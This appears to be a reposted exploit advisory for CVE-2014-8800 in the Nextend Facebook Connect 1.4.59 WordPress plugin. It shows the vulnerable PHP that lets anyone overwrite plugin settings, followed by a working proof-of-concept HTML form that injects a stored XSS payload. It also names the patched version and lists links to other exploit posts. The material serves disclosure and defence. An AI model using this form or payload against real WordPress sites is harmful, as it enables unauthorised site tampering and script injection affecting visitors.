# Exploit Title: Nextend Facebook Connect 1.4.59 XSS
# Date: 16-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.4.59.zip
# Category: webapps
# CVE: CVE-2014-8800
1. Description
Anyone can change plugin settings.
File: nextend-facebook-connect\nextend-facebook-settings.php
if(isset($_POST['newfb_update_options'])) {
if($_POST['newfb_update_options'] == 'Y') {
foreach($_POST AS $k => $v){
$_POST[$k] = stripslashes($v);
}
update_option("nextend_fb_connect", maybe_serialize($_POST));
$newfb_status = 'update_success';
}
}
http://security.szurek.pl/nextend-facebook-connect-1459-xss.html
2. Proof of Concept
<form method="post" action="http://wordpress-instalation">
<input type="hidden" name="newfb_update_options" value="Y">
XSS: <textarea name="fb_login_button" rows="10" cols="40"><img src=x onerror=alert(String.fromCharCode(88,83,83))></textarea>
<input type="submit" value="Hack!">
</form>
3. Solution:
Update to version 1.5.1
https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.5.1.zip
https://wordpress.org/plugins/nextend-facebook-connect/changelog/
Related Posts
- vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability03 Mar 20150
Full title vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection D...Read more »
- Joomla HD FLV Player < 2.1.0.1 - SQL Injection Vulnerability10 Dec 20140
#!/usr/bin/python## Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection## Exp...Read more »
- Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection10 Dec 20140
Vulnerability title: Multi SQL Injection in SP Client Document Manager plugin CVE: N/A Vendor: h...Read more »
- Wordpress Google Document Embedder 2.5.14 - SQL Injection10 Dec 20140
# Exploit Title: Google Doc Embedder 2.5.14 SQL Injection # Date: 10-11-2014 # Exploit Auth...Read more »
- Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability10 Dec 20140
#!/usr/bin/python ## Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell...Read more »
Đăng ký:
Đăng Nhận xét (Atom)
Đăng nhận xét Blogger Facebook
Click to see the code!
To insert emoticon you must added at least one space before the code.